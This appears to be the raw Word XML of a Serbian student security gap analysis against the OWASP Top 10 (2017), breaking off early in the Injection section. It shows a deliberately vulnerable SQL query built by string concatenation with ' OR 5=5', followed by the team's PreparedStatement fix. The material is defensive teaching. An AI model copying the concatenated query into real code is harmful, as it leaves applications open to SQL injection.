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4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="96"/>
        </w:rPr>
        <w:t>Gap analiza</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>(OWASP Top 10 rizika 2017)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="6350">
            <wp:extent cx="4966335" cy="1760855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="Image result for owa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 result for owasp"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4966335" cy="1760855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9062" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1129"/>
        <w:gridCol w:w="7933"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4948">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>A1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4948">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>A2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>Broken Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4948">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>A3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>Sensitive Data Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4948">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>A4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>XML External Entities (XXE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4948">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>A5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4948">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>A6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4948">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>A7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>Cross-Site Scripting (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4948">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>A8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">Insecure </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>Deserialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4948">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>A9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>Using Components with Known Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4948">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>Insufficient Logging &amp; Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Autori (Tim 17):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Bojana Samardžić RA 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/2014</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Aleksandar Lupić RA 33</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/2014</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Nena Vidović</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> RA 244/2015</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9351" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="8248"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4948">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>A1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8247" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Realizacija Injection napada moguća je </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">ukoliko se interpreteru pošalju podaci koji nisu validirani. Postoji više vrsta Injection napada: SQL Injection, NoSQL Injection, OS, LOG, LDAP, EL i OGNL Injection. Podaci koji stignu od malicioznog napadača mogu prevariti interpreter tako da on počne da </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>izvršava nepredviđene komande ili je omogućen pristup podacima bez odgovarajuće autorizacije.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Primer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>SQL Injection se najčešće dešava kada korisnik u polje koje nije za to predviđeno (npr. polje za unos korisničkih kredencijala) unese SQL naredbu koja po</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>tom pokreće bazu podataka.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>txtUserId = getRequestString("UserId");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId + " OR 5=5";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="D4128F"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">U našem sistemu: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>relevantan je SQL Injection, koji rešavamo upotrebom parametrizovanih upita koji se šalju bazi pod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">ataka. Prepared Statement-i osiguravaju da napadač ne može da promeni namenu upita. Ukoliko napadač unese korisnički ID uz „OR 5=5“, zbog upotrebe parametrizovanih upita ranjivosti su </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>izbegnute jer će se pretraga bukvalno vršiti po kriterijumu čitavog unet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">og stringa. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">String name = request.getParameter("name"); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>String query = "SELECT account_balance FROM user_data WHERE user_name = ? ";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>PreparedStatement pstmt = connection.prepareStatement(query);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
